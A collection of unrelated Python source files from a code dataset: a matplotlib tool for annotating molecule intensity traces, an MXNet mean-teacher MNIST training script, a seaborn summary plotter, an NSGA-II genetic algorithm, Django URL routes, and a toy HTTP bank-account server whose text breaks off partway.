event.key\n if k == 'a': self.autoThreshold_plot(event, find_all=False)\n if k == 'ctrl+a': self.autoThreshold_plot(event, find_all=True)\n elif k in ['left', 'right']: self.save_molecule(event, move=True)\n elif k == 'z': self.auto_reject(event)\n elif k == 'c': self.draw.clear_all(event)\n elif k in [',', '.', '/']: self.select_edge(k)\n elif k == ' ': self.select_molecule(toggle=True)\n elif k == 'r': self.radio_manage('red')\n elif k == 'g': self.radio_manage('green')\n elif k == 'e': self.check_fret('E')\n elif k == 't': self.throw_away(event)\n\n self.fig.canvas.draw()\n\n def load_from_Molecule(self):\n if self.mol.steps is None:\n return\n else:\n s = self.mol.steps\n [self.axes[0].axvline(f, zorder=0, lw=0.65, label=\"saved r\")\n for f in s.time[s.trace == 'red'].values]\n [self.axes[0].axvline(f, zorder=0, lw=0.65, label=\"saved g\")\n for f in s.time[s.trace == 'green'].values]\n [self.axes[1].axvline(f, zorder=0, lw=0.65, label=\"saved E\")\n for f in s.time[s.trace == 'E'].values]\n\n def select_molecule(self, toggle=True, deselect=False):\n if toggle:\n self.mol.isSelected = not self.mol.isSelected\n elif deselect:\n self.mol.isSelected = False\n else:\n self.mol.isSelected = True\n title = f'Molecule: {self.mol.index} /{len(self.file.molecules)}'\n title += ' selected'*(self.mol.isSelected)\n rgba = matplotlib.colors.to_rgba\n c = rgba('g')*self.mol.isSelected + rgba('w')*(not self.mol.isSelected)\n self.axes[0].set_title(title, color=c)\n self.fig.canvas.draw()\n\n def throw_away(self, event):\n if self.mol.steps is not None:\n self.mol.steps = None\n lines = self.axes[0].get_lines() + self.axes[1].get_lines()\n [l.remove() for l in lines if l.get_label().split()[0] in ['man', 'thres', 'saved']]\n self.select_molecule(toggle=False, deselect=True)\n self.fig.canvas.draw()\n\n\n def save_molecule(self, event=None, move=True, draw=True):\n # Assume acceptance of auto matically found and manually selected dwell times\n lines = self.axes[0].get_lines() + self.axes[1].get_lines()\n lines = [l for l in lines if l.get_label().split()[0] in [\"man\", \"thres\"]]\n self.mol.kon_boolean = self.kon\n if lines:\n if len(lines) % 2 != 0:\n print(f'Found an odd number of steps. Molecule {self.mol.index} not added')\n return\n if self.mol.steps is None:\n self.mol.steps = pd.DataFrame(columns=['time', 'trace', 'state',\n 'method','thres'])\n self.mol.isSelected = True\n\n for l in lines:\n method = l.get_label().split()[0]\n thres = \"N/A\"*(method=='man') + str(self.thrsliders[0].val)*(method =='thres')\n\n d = {'time': l.get_xdata()[0], 'trace': l.get_label().split()[1],\n 'state': 1, 'method': method, 'thres': thres}\n\n self.mol.steps= self.mol.steps.append(d, ignore_index=True)\n self.mol.steps.drop_duplicates(inplace=True)\n kon = [f'{int(i)}' for i in self.mol.kon_boolean.flatten()]\n kon = ''.join(kon)\n if 'kon' not in self.mol.steps.columns:\n kon = pd.DataFrame.from_records([{\"kon\": kon}])\n self.mol.steps = pd.concat([self.mol.steps, kon], axis=1)\n self.mol.steps.fillna(value='-')\n else:\n self.mol.steps.loc[0, 'kon'] = kon\n\n if move:\n if event.inaxes == self.axnextb or event.key in ['right']:\n if self.mol_indx > len(self.file.molecules):\n self.mol_indx = 1\n else:\n self.mol_indx += 1\n elif event.inaxes == self.axprevb or event.key in ['left']:\n self.mol_indx -= 1\n\n self.plot_molecule(draw_plot=draw)\n\n def conclude_analysis(self, event=None, save=True):\n # Save current molecule if it was analyzed\n self.save_molecule(move=False)\n # Concatenate all steps dataframes that are not None\n mol_data = [mol.steps for mol in self.file.molecules if mol.steps is not None]\n if not mol_data:\n print('no data to save')\n return\n keys = [f'mol {mol.index}' for mol in self.file.molecules if mol.steps is not None]\n steps_data = pd.concat(mol_data, keys=keys)\n if save:\n print(\"steps saved\")\n writer = pd.ExcelWriter(f'{self.file.name}_steps_data.xlsx')\n steps_data.to_excel(writer, self.file.name)\n writer.save()\n\n\n def autoThreshold_plot(self, event=None, find_all=False):\n self.auto_reject()\n # Find the steps for the checked buttons\n sel = self.radio.value_selected\n color = self.red*bool(sel == \"red\") + self.green*bool(sel == \"green\") # Select red or green\n steps = self.mol.find_steps(color, threshold=self.thrsliders[0].val)\n l_props = {\"lw\": 0.75, \"zorder\": 5, \"label\": \"thres \"+sel}\n [self.axes[0].axvline(s*self.exp_time, **l_props) for s in steps[\"start_frames\"]]\n [self.axes[0].axvline(s*self.exp_time, ls=\"--\", **l_props) for s in steps[\"stop_frames\"]]\n if self.checkbfret.get_status()[0]:\n steps = self.mol.find_steps(self.fret, threshold=self.thrsliders[1].val)\n l_props = {\"lw\": 0.75, \"zorder\": 5, \"label\": \"thres E\"}\n [self.axes[1].axvline(s*self.exp_time, **l_props) for s in steps[\"start_frames\"]]\n [self.axes[1].axvline(s*self.exp_time, ls=\"--\", **l_props) for s in steps[\"stop_frames\"]]\n self.fig.canvas.draw()\n if find_all:\n for mol in self.file.molecules:\n self.autoThreshold_plot(find_all=False)\n print(f'Analyzed mol {self.mol.index} /{len(self.file.molecules)}')\n e = matplotlib.backend_bases.KeyEvent('key_press_event', self.fig.canvas, 'right')\n if mol != self.file.molecules[-1]:\n self.save_molecule(event=e, move=True, draw=False)\n elif mol == self.file.molecules[-1]:\n self.conclude_analysis()\n return\n\n def auto_reject(self, event=None):\n for ax in self.axes:\n lines = ax.get_lines()\n [l.remove() for l in lines if l.get_label().split()[0] == 'thres']\n self.fig.canvas.draw()\n\n def mouse_cursor(self, event):\n if not event.inaxes :\n self.fret_edge_lock = True\n return\n ax = event.inaxes\n if ax == self.axes[0]:\n self.fret_edge_lock = True\n self.fig.canvas.mpl_connect('motion_notify_event', self.cursors[0].mouse_move)\n self.fig.canvas.mpl_connect('motion_notify_event', self.cursors[1].mouse_move)\n\n rad = self.radio.value_selected\n i = ['red', 'green'].index(rad)\n t, I = self.cursors[i].ly.get_xdata(), self.cursors[i].lx.get_ydata()\n try:\n labels = [rf\"t = {t:.1f}, $I_R$ = {I:.0f}\", rf\"t = {t:.1f}, $I_G$ = {I:.0f}\"]\n self.cursors[i].txt.set_text(labels[i])\n except TypeError:\n pass\n self.fig.canvas.draw()\n\n elif ax == self.axes[1]:\n self.fret_edge_lock = False\n self.fig.canvas.mpl_connect('motion_notify_event', self.cursors[-1].mouse_move)\n t, E = self.cursors[-1].ly.get_xdata(), self.cursors[-1].lx.get_ydata()\n try:\n self.cursors[-1].txt.set_text(f\"t = {t:.1f}, E = {E:.2f}\")\n except TypeError:\n pass\n self.fig.canvas.draw()\n\n elif ax in self.axthrsliders:\n indx = int(ax == self.axthrsliders[1]) # gives 0 if ax is upper (I) plot, 1 if ax is lower (E) plot\n self.slidel[indx].set_ydata(self.thrsliders[indx].val)\n self.slidel[indx].set_visible(True)\n self.fig.canvas.draw()\n\n\n def radio_manage(self, label):\n def update_slider(color, label):\n s = self.thrsliders[0]\n s.poly.set_color(color); s.label.set(text=label)\n\n indx = int(label == 'green') # 1 if green, 0 if red\n self.axes[0].get_lines()[not indx].set_zorder((not indx)+2)\n self.axes[0].get_lines()[indx].set_zorder(indx)\n self.radio.circles[indx].set_color(label[0])\n self.radio.circles[not indx].set_color(\"black\")\n update_slider(label[0], r\"$I_G$\"*bool(indx)+r\"$I_R$\"*bool(not indx))\n # Check the edge colors and set to white if not selected color\n sel = self.radio.value_selected\n selcol = matplotlib.colors.to_rgba(sel[0])\n spcol = [self.axes[0].spines[s].get_edgecolor() for s in ['left','bottom','right']]\n if selcol not in spcol:\n [self.axes[0].spines[s].set_color('white') for s in ['left','bottom','right']]\n\n self.load_edges()\n\n def load_edges(self, load_fret=False): # loads edge color from kon array\n sel = self.radio.value_selected\n kons = [self.kon[int(sel == 'green')]] ; colors = [sel[0]]\n if load_fret: kons.append(self.kon[2]) ;colors.append('blueviolet')\n\n for i, kon in enumerate(kons):\n selected_sides = list(itertools.compress(['left','bottom','right'], kon))\n unselected_sides = list(itertools.compress(['left','bottom','right'], np.invert(kon)))\n [self.axes[i].spines[s].set_color(colors[i]) for s in selected_sides]\n [self.axes[i].spines[s].set_color('white') for s in unselected_sides]\n\n self.fig.canvas.draw()\n\n def select_edge(self, key):\n if self.fret_edge_lock:\n ax = self.axes[0]\n sel = self.radio.value_selected[0] # get the selected color of the radiobutton\n elif not self.fret_edge_lock:\n ax = self.axes[1]\n sel = 'blueviolet' # this refers to the fret color\n\n side = 'left'*(key == ',') + 'bottom'*(key == '.') + 'right'*(key == '/')\n\n spcolor = ax.spines[side].get_edgecolor()\n selcol, w = matplotlib.colors.to_rgba(sel), matplotlib.colors.to_rgba('white')\n c = selcol*(spcolor == w) + w*(spcolor == selcol)\n ax.spines[side].set_color(c)\n\n self.update_kon(sel, selcol, side, ax)\n\n def update_kon(self, sel=None, selcol=None, side=None, ax=None):\n i = ['r', 'g', 'blueviolet'].index(sel) # These are the colors of the sides. blueviolet refers to fret\n j = ['left', 'bottom', 'right'].index(side)\n self.kon[i][j] = (ax.spines[side].get_edgecolor() == selcol)\n\n\n def check_fret(self, label):\n if self.checkbfret.get_status()[0]:\n self.checkbfret.rectangles[0].set_color(\"b\")\n elif not self.checkbfret.get_status()[0]:\n self.checkbfret.rectangles[0].set_color(\"black\")\n self.fig.canvas.draw()\n\nclass Draw_lines(object):\n def __init__(self, fig, iplot_radio):\n self.lines = []\n self.fig = fig\n self.radio = iplot_radio # The InteractivePlot instance\n\n def onclick(self, event):\n if self.fig.canvas.manager.toolbar.mode != '': # self.fig.canvas.manager.toolmanager.active_toggle[\"default\"] is not None:\n return\n if event.inaxes is None:\n return\n ax = event.inaxes\n if event.button == 1:\n if ax == self.fig.get_axes()[0] or ax == self.fig.get_axes()[1]:\n sel = self.radio.value_selected*(ax == self.fig.get_axes()[0])\n sel = sel + \"E\"*(ax == self.fig.get_axes()[1])\n l = ax.axvline(x=event.xdata, zorder=0, lw=0.65, label=\"man \"+sel)\n self.lines.append(l)\n\n if event.button == 3 and self.lines != []:\n self.lines.pop().remove()\n self.fig.canvas.draw()\n\n def clear_all(self, event):\n while self.lines:\n self.lines.pop().remove()\n self.fig.canvas.draw()\n\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n#mainPath = './traces'\nmainPath = './simulations'\nexp = analysis.Experiment(mainPath, 0.1)\ni = InteractivePlot(exp.files[0])\ni.plot_initialize()\ni.plot_molecule()\n#plt.show()\n\n\n#self.fig.canvas.manager.toolmanager.add_tool('Next', NextTool)\n#self.fig.canvas.manager.toolbar.add_tool('Next', 'foo')\n#class NextTool(ToolBase, InteractivePlot):\n# '''Go to next molecule'''\n# default_keymap = 'enter, right'\n# description = 'Next Molecule 1'\n#\n# def trigger(self, *args, **kwargs):\n# pass\n# InteractivePlot.__init__(InteractivePlot, self.file)\n# print(self.mol_indx\n# )\n# InteractivePlot.plot_setup(InteractivePlot)\n# print(InteractivePlot.mol)","sub_path":"interactive_analysis_v3.1.py","file_name":"interactive_analysis_v3.1.py","file_ext":"py","file_size_in_byte":21470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"343577337","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 14 12:46:58 2018\n\n@author: bdus\n\nbaseline:\nhttps://github.com/bdus/programpractice/blob/master/mxnet/mnist_semi/supervised/experiments/finetune/train_finetune.py\n\nmean teacher are better role model\n\n\"\"\"\n\n\nimport _init_paths\n\nimport os\nimport mxnet as mx\nimport numpy as np\nfrom gluoncv import model_zoo as mzoo\n\nfrom mxnet import autograd, gluon, init, nd\nfrom mxnet.gluon import nn, loss as gloss\n\nfrom symbols import symbols\n\nbatch_size = 100\nstochastic_ratio = 0.01\n\nctx = mx.cpu() #[mx.gpu(i) for i in range(num_gpus)] if num_gpus > 0 else [mx.cpu()]\n\n# get data csv\ntransform=lambda data, label: (data.reshape(784,).astype(np.float32)/255, label)\ntrain_data = gluon.data.DataLoader(dataset= gluon.data.vision.MNIST(train=True,transform=transform), batch_size=100,shuffle=True,last_batch='discard')\nval_data = gluon.data.DataLoader(dataset= gluon.data.vision.MNIST(train=False,transform=transform), batch_size=100,shuffle=False)\n\n\n# network\nmodelname = 'semi_mt_simple2'\n\nbasemodel_zoo = 'simple2'\nnet_s = symbols.get_model(basemodel_zoo)\nnet_t = symbols.get_model(basemodel_zoo)\n#net_s.initialize(mx.init.Xavier(magnitude=2.24))\n#net_t.initialize(mx.init.Xavier(magnitude=2.24))\nnet_t.load_parameters( os.path.join('symbols','para','%s_t.params'%(modelname)) )\nnet_s.load_parameters( os.path.join('symbols','para','%s_s.params'%(modelname)) )\n\n#net.load_parameters(os.path.join('symbols','para','%s.params'%(modelname)))\n\n# g(x) : stochastic input augmentation function\ndef g(x):\n return x + nd.random.normal(0,stochastic_ratio,shape=x.shape)\n\n\n# loss function\nl_logistic = gloss.SoftmaxCrossEntropyLoss()\nl_l2loss = gloss.L2Loss() \nmetric = mx.metric.Accuracy()\n\ndef net_liner(net,net2,x1,x2,b):\n # net.para = x1 * net2.para + x2 * net.para + b\n for (k, v) , (k2, v2) in zip( net.collect_params().items() , net2.collect_params().items() ):\n v.set_data(v2.data() * x1 + v.data() * x2 + b)\n \n# train\ndef test():\n metric = mx.metric.Accuracy()\n for data, label in val_data:\n X = data.reshape((-1,1,28,28))\n #img = nd.concat(X,X,X,dim=1)\n output = net_t(X)\n metric.update([label], [output])\n return metric.get()\n \ndef train(epochs,alpha=0,beta=0,lr=0.1):\n #net.initialize(mx.init.Xavier(magnitude=2.24))\n print('ems_alpha = %f, consis_beta = %f ,lr = %f'%(alpha,beta,lr))\n trainer = gluon.Trainer(net_s.collect_params(),'sgd',{'learning_rate':lr})\n for epoch in range(epochs):\n metric.reset()\n for i, (X, y) in enumerate(train_data):\n X = nd.array(X)\n X = X.reshape((-1,1,28,28)) \n y = nd.array(y)\n #y = nd.one_hot(y,10) \n with autograd.record():\n y_s = net_s(g(X)) \n y_t = net_t(g(X)) \n L = l_logistic(y_s,y) + beta * l_l2loss(y_s,y_t)\n L.backward()\n trainer.step(batch_size)\n # net_t = alpha * net_t + (1-alpha) * net_s\n # alpha == 0 : copy student ; \n net_liner(net_t,net_s,1-alpha,alpha,0)\n #metric.update(y,y_t)\n #if i % 50 == 0:\n #name, acc = metric.get()\n #print('[Epoch %d Batch %d] Training: %s=%f'%(epoch, i, name, acc))\n metric.update(y,y_t)\n name, acc = metric.get()\n print('[Epoch %d] Training: %s=%f'%(epoch, name, acc))\n name, val_acc = test()\n print('[Epoch %d] Validation: %s=%f'%(epoch, name, val_acc)) \n if epoch % 10 == 0:\n net_t.save_parameters( os.path.join('symbols','para','%s_t.params'%(modelname)) )\n net_s.save_parameters( os.path.join('symbols','para','%s_s.params'%(modelname)) )\n net_t.save_parameters( os.path.join('symbols','para','%s_t.params'%(modelname)) )\n net_s.save_parameters( os.path.join('symbols','para','%s_s.params'%(modelname)) )\n\nif __name__ == '__main__':\n num_epochs = 10\n alpha = 0\n beta = 0\n train(20)\n for i in range(10):\n train(10,beta=0.1*i)\n for i in range(10):\n train(10,alpha=0.01*i, beta=0.1*i)\n for i in range(10):\n train(10,alpha=0.01*i, beta=1) \n train(100,alpha=0.1,beta=1)\n train(100,alpha=0.01,beta=1,lr=0.1)\n train(100,alpha=0.01,beta=1,lr=0.01)\n ","sub_path":"mxnet/mnist_semi/semi/train_mt.py","file_name":"train_mt.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"649328625","text":"\"\"\"\nUsed to make a summary plot of network properties and classification accuracy\n\"\"\"\n\nimport glob\nimport os\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom params import *\n\n# parameters has to be tweaked manually\nintra_mode = 'unimodal'\ninter_mode = 'unimodal'\nPATH = os.getcwd() + '/data/sum/'\nxticks = [\"M0\", \"M1\", \"M2\", \"M3\"] # xlabels are module indices\n\n\n\n\"\"\"\nmeasures figures\n\"\"\"\n# load data and melt in an appropriate format\nmeasures = pd.read_csv(PATH + 'measures_intra={}_inter={}.csv'.format(intra_mode, inter_mode), keep_default_na=False)\nmetrics = measures.columns[1:] # 4 different metrics, first column is indices\nmeasures = measures\nmeasures['network type'] = pd.Categorical(measures['network type'], categories=['noise', 'random', 'topo'])\nmeasures = measures.melt(id_vars=['module index', 'network type', 'intra type', 'intra params', 'inter type',\n 'inter params'], var_name='metric').sort_values(by=['network type', 'module index'])\nprint(measures)\n\n# plot\nsns.set(font_scale=1.5)\ng = sns.FacetGrid(measures, col=\"metric\", row=\"network type\", hue='network type',\n sharex=True, sharey='col', margin_titles=False)\ng.map_dataframe(sns.lineplot, \"module index\", 'value', style='intra params', legend='full')\n\n# ticks and labels\nylabels = [\"Pearson CC\", \"LvR\", \"spikes/sec\", \"Fano factor\"] # ylabels are units of metrics\nfor row_i in range(3):\n for ax_i, ax in enumerate(g.axes[row_i]):\n ax.set(title=None, ylabel=None)\nfor ax_i, ax in enumerate(g.axes[0]):\n ax.set(title=metrics[ax_i], ylabel=ylabels[ax_i], xticklabels=xticks, xticks=np.arange(4))\n\n# legends\ng.add_legend()\nhandles, labels = g.axes[-1][-1].get_legend_handles_labels()\ng.axes[-1][-1].legend(handles=handles[5:], labels=labels[5:], bbox_to_anchor=(1.9, 1.0))\n\n# save the figure\nplt.savefig(\"ultimate_intra={}_inter={}.pdf\".format(intra_mode, inter_mode), bbox_to_inches=\"tight\")\n\n\n\n# \"\"\"\n# training figures\n# \"\"\"\n# training = pd.read_csv(PATH + 'training_intra={}_inter={}.csv'.format(intra_mode, inter_mode), keep_default_na=False)\n# training = training.melt(id_vars=['module index', 'network type', 'intra type',\n# 'inter type', 'intra params', 'inter params'], var_name='metric')\n# print(training)\n#\n# sns.set(font_scale=2)\n# g = sns.catplot(x=\"module index\", y=\"value\", hue='intra params', data=training,\n# kind='bar', row=\"metric\", col='network type', sharey='row', margin_titles=True,\n# ci='sd', alpha=0.7)\n# for ax in g.axes[0]:\n# ax.axhline(y=0.1, color='black', linewidth=2.0)\n\n#\n# plt.savefig(\"training_intra={}_inter={}.pdf\".format(intra_mode, inter_mode), bbox_to_inches=\"tight\")\n","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"9830936","text":"from my_utils import *\nimport numpy as np\nfrom datetime import datetime\n\ndef NSGA(dimension):\n c,w = gen_model(dimension)\n\n # 从中群中选择一个父节点出来(选目标函数大的)\n def BinaryTournament(P):\n size = P.shape[0]\n t1 = P[np.random.randint(size)]\n t2 = P[np.random.randint(size)]\n minus = target_function(c,w,t1) - target_function(c,w,t2)\n return t1 if np.sum(minus) > 0 else t2\n\n # 返回排好序的解集列表(大的在前小的在后)\n def fastNonDominatedSorting(P):\n rank = np.zeros(P.shape[0])\n\n S = [[] for i in range(P.shape[0])]\n n = np.zeros(P.shape[0])\n F = []\n for x in range(P.shape[0]):\n for y in range(P.shape[0]):\n if dominatedBy(c,w,P[y],P[x]):\n S[x].append(y)\n elif dominatedBy(c,w,P[x],P[y]):\n n[x] += 1\n if n[x] == 0:\n rank[x] = 1\n F.append(x)\n \n i = 0\n while len(F)>0:\n Q = []\n for x in F:\n for y in S[x]:\n n[y] -= 1\n if n[y] == 0:\n rank[y] = i+1\n Q.append(y)\n i += 1\n F = Q\n \n ret = []\n for i in range(1,P.shape[0]+1):\n tmp = []\n for j in range(len(rank)):\n if rank[j] == i:\n tmp.append(P[j])\n if len(tmp)>0:\n ret.append(tmp)\n else:\n break\n \n # 反转,使大的排在前面\n return ret[::-1]\n \n # 计算crosding分数,返回 ndarray\n def crowdingDistance(P):\n target = [target_function(c,w,p) for p in P]\n target = np.array(target).T # 转置之后大小为: target维度 x individual\n # 设置初始distance为0\n distance = np.zeros([len(P)])\n for dim in range(target.shape[0]):\n Q = target[dim,:]\n Q = np.sort(Q)\n scale = Q.max() - Q.min()\n for i in range(len(P)):\n index = int(np.where(Q == target[dim][i])[0][0])\n if index==0 or index==target.shape[1]-1:\n distance[i] = 100000 # 设为无穷大\n else:\n distance[i] += (Q[index+1] - Q[index-1]) / scale\n return distance\n\n\n # 要开始咯\n p = init_population()\n for epoch in range(Epoch):\n print(datetime.now().strftime('20%y-%m-%d %H:%M:%S'),\" NSGA-II on\",str(dimension)+'d',\" Epoch:\",epoch)\n # 父代挑选、生成子代\n offspring = []\n while len(offspring) < PopulationSize:\n p1 = BinaryTournament(p)\n p2 = BinaryTournament(p)\n \n p1 = mutation(p1)\n p2 = mutation(p2)\n\n child = crossover(p1,p2)\n offspring.append(child)\n \n new_pop = np.array(list(p)[:] + offspring[:])\n\n # N+N selection\n pops = fastNonDominatedSorting(new_pop)\n p = [] # 重置种群\n for tmp in pops: # tmp是个List\n if len(p) == PopulationSize:\n break\n elif len(p) + len(tmp) <= PopulationSize:\n p += tmp\n else:\n dis = crowdingDistance(tmp)\n k = PopulationSize-len(p)\n ids = np.argpartition(dis,-k)\n for index in ids[-k:]:\n p.append(tmp[index])\n \n p = np.array(p)\n\n print('NSGA-II Success!')\n ret = [gen_result(individual) for individual in p]\n\n print(\"Final Population Size:\",end=' ')\n for i in range(len(ret)):\n print(len(ret[i]),end=' ')\n print()\n\n return ret","sub_path":"启发式搜索与演化算法/hw4/my_NSGA_II.py","file_name":"my_NSGA_II.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"316455407","text":"\"\"\"\nNodule for asynchronously saving files and computing data\n\"\"\"\nimport os\nimport asyncio\nimport sys\n\n__author__ = \"Przemek\"\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nprint(BASE_DIR)\nFILES_DIR = os.path.dirname(os.path.join(BASE_DIR, 'async', ''))\n\n\ndef create_directory(directory):\n \"\"\"Create directory for files, if not exist\"\"\"\n base_dir = BASE_DIR\n if not os.path.exists(directory):\n os.makedirs(directory)\n return os.path.dirname(os.path.abspath(directory)) + '\\{}'.format(directory)\n\nasync def compute_values(x, y, z):\n return (x * y) / z\n\n\nasync def save_values(x, y, z, path, name):\n while True:\n await compute_values(x, y, z)\n with open(path + '\\{}.txt'.format(name), mode='w+') as file:\n file.write(compute_values(x, y ))\n\n\ndef got_result(future):\n print(future.result())\n\n\nfiles_dir = create_directory('filess')\n# main event loop\nloop = asyncio.get_event_loop()\n\n# Create a task from coroutine\ntask = loop.create_task(save_values(2, 4, 6, files_dir, 'log'))\n\n# Please notify when task is completed\ntask.add_done_callback(got_result)\n\n# The loop will run forever\nloop.run_until_complete(task)\n","sub_path":"async/[ASYNC] calculate_data_save_to_file.py","file_name":"[ASYNC] calculate_data_save_to_file.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401228397","text":"# from django.urls import path\n# from . import views\n\n\n# urlpatterns = [\n# path('location/', views.get_post_locations.as_view(), name=\"location-all\")\n# ]\nfrom django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^location/(?P<pk>[0-9]+)$', # urls with details i.e /movies/(1-9)\n views.get_delete_update_location,\n name='get_delete_update_location'\n ), \n url(\n r'^locations/$', # urls list all and create new one\n views.get_post_locations,\n name='get_post_locations'\n ), \n url(\n r'^viewer', # urls list all and create new one\n views.index,\n name='index'\n ),\n # url(\n # r'^static', # urls list all and create new one\n # views.static,\n # name='static'\n # ), \n]","sub_path":"lotrlocations/locations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"47931136","text":"import csv\nimport io\nimport json\nimport os.path\nimport shutil\n\nfrom http import HTTPStatus\nfrom http.server import ThreadingHTTPServer, BaseHTTPRequestHandler\n\n__version__ = \"0.0\"\n\n\nclass AbcHTTPRequestHandler(BaseHTTPRequestHandler):\n server_version = \"AbcHTTP/\" + __version__\n protocol_version = \"HTTP/1.1\"\n\n pages_path = \"www\"\n main_page_path = os.path.join(pages_path, \"MainPage.html\")\n\n user_accounts_page_path = os.path.join(pages_path, \"UserAccountsPage.html\")\n user_accounts_page_above_rows = None\n user_account_row_template = None\n user_accounts_page_below_rows = None\n\n user_accounts_action_result_page_path = os.path.join(pages_path, \"UserAccountsActionResult.html\")\n user_accounts_action_result_page = None\n\n request_user_login = \"/user/?login=\"\n\n # noinspection PyPep8Naming\n def do_HEAD(self):\n self.send_response(HTTPStatus.NOT_IMPLEMENTED)\n\n # noinspection PyPep8Naming\n def do_GET(self):\n request = self.path\n print(request)\n # Main page\n if request == \"/\":\n self.send_main_page()\n # User sign in\n elif request.startswith(self.request_user_login):\n self.send_user_accounts(request[len(self.request_user_login):])\n # 404\n else:\n self.send_error(HTTPStatus.NOT_FOUND)\n\n # noinspection PyPep8Naming\n def do_POST(self):\n request = self.path\n print(request)\n # read request body\n content_length = 0\n h = self.headers\n for item in h.items():\n if item[0].lower() == \"content-length\":\n content_length = int(item[1])\n break\n if content_length != 0:\n request_body = self.rfile.read(content_length).decode('utf-8')\n else:\n self.send_error(HTTPStatus.BAD_REQUEST)\n return\n print(request_body)\n\n # request_body: param=value¶m=value&parm=value\n param_dict = {}\n for param in request_body.split('&'):\n key_and_value = param.split('=')\n param_dict[key_and_value[0]] = key_and_value[1]\n \n # action with account\n if request == \"/user/accounts/action\":\n # request_body: login=user1&account-number=001&amount=100&account-action=deposit\n dbh = UserDatabaseHandler(param_dict[\"login\"])\n result_of_request_to_db = dbh.action_on_account(param_dict)\n # create new account\n elif request == \"/user/accounts/create\":\n # request_body: login=user1¤cy=RUB\n dbh = UserDatabaseHandler(param_dict[\"login\"])\n result_of_request_to_db = dbh.create_new_account(param_dict)\n # 404\n else:\n self.send_error(HTTPStatus.NOT_FOUND)\n return\n\n # send result\n self.send_user_accounts_action_result_page(param_dict['login'], result_of_request_to_db)\n\n def send_main_page(self):\n with open(self.main_page_path, 'rb') as main_page:\n self.send_response(HTTPStatus.OK)\n self.send_header(\"Content-Type\", \"text/html; charset=UTF-8\")\n self.send_header(\"Content-Length\", str(os.fstat(main_page.fileno())[6]))\n self.end_headers()\n shutil.copyfileobj(main_page, self.wfile)\n\n def __init_user_accounts_template__(self):\n with open(self.user_accounts_page_path, 'r') as f:\n start_mark = \"{begin account-row-template}\"\n end_mark = \"{end account-row-template}\"\n page_template = f.read()\n self.user_accounts_page_above_rows = page_template[:page_template.find(start_mark)]\n self.user_account_row_template = \\\n page_template[page_template.find(start_mark) + len(start_mark):page_template.find(end_mark)]\n self.user_accounts_page_below_rows = page_template[page_template.find(end_mark) + len(end_mark):]\n\n def send_user_accounts(self, username):\n dbh = UserDatabaseHandler(username)\n user_accounts = dbh.get_user_accounts('r')\n if user_accounts is None:\n dbh.create_new_user()\n\n if self.user_accounts_page_above_rows is None:\n self.__init_user_accounts_template__()\n\n accounts_rows = \"\"\n accounts_dict = json.load(user_accounts)\n user_accounts.close()\n for account_number in accounts_dict:\n a_row = self.user_account_row_template.\\\n replace(\"{number}\", account_number).\\\n replace(\"{currency}\", accounts_dict[account_number][\"currency\"]).\\\n replace(\"{amount}\", str(accounts_dict[account_number][\"amount\"])).\\\n replace(\"{username}\", username)\n accounts_rows += a_row + '\\n'\n\n response_body = \\\n self.user_accounts_page_above_rows.replace(\"{username}\", username) \\\n + accounts_rows \\\n + self.user_accounts_page_below_rows\n response_body = response_body.encode('utf-8')\n response_body_stream = io.BytesIO()\n response_body_stream.write(response_body)\n response_body_stream.seek(0)\n\n self.send_response(HTTPStatus.OK)\n self.send_header(\"Content-Type\", \"text/html; charset=UTF-8\")\n self.send_header(\"Content-Length\", str(len(response_body)))\n self.end_headers()\n shutil.copyfileobj(response_body_stream, self.wfile)\n\n def send_user_accounts_action_result_page(self, username, result_of_request_to_db):\n if self.user_accounts_action_result_page is None:\n with open(self.user_accounts_action_result_page_path, 'r') as file:\n self.user_accounts_action_result_page = file.read()\n\n response_body = self.user_accounts_action_result_page.\\\n replace(\"{username}\", username).\\\n replace(\"{result}\", result_of_request_to_db[1])\n response_body = response_body.encode('utf-8')\n response_body_stream = io.BytesIO()\n response_body_stream.write(response_body)\n response_body_stream.seek(0)\n\n self.send_response(HTTPStatus.OK)\n self.send_header(\"Content-Type\", \"text/html; charset=UTF-8\")\n self.send_header(\"Content-Length\", str(len(response_body)))\n self.end_headers()\n shutil.copyfileobj(response_body_stream, self.wfile)\n\n\n# TODO:\n# py file for class\n# request result constants outside the class\nclass UserDatabaseHandler:\n database_path = \"database\"\n index = os.path.join(database_path, \"database.index\")\n\n REQUEST_RESULT_OK = (0, \"Success\")\n REQUEST_RESULT_ERROR_WRONG_REQUEST_OR_DATABASE_ERROR = (100, \"Wrong request or internal database error\")\n REQUEST_RESULT_ERROR_WRONG_REQUEST = (200, \"Wrong request\")\n REQUEST_RESULT_ERROR_WRONG_REQUEST_INSUFFICIENT_FUNDS = (201, \"Insufficient funds\")\n REQUEST_RESULT_ERROR_WRONG_REQUEST_UNSUPPORTED_ACTION = (202, \"Unsupported action\")\n REQUEST_RESULT_ERROR_DATABASE_ERROR = (300, \"Internal database error\")\n\n def __init__(self, username):\n self.username = username\n\n def create_new_user(self):\n user_accounts_path = self.username + \".acc\"\n user_index = [self.username, user_accounts_path]\n with open(self.index, 'a') as index_file:\n csv.writer(index_file).writerow(user_index)\n with open(os.path.join(self.database_path, user_accounts_path), 'w') as account_file:\n empty_dict = {}\n json.dump(empty_dict, account_file)\n\n def get_user_accounts_path(self):\n \"\"\"\n Search the 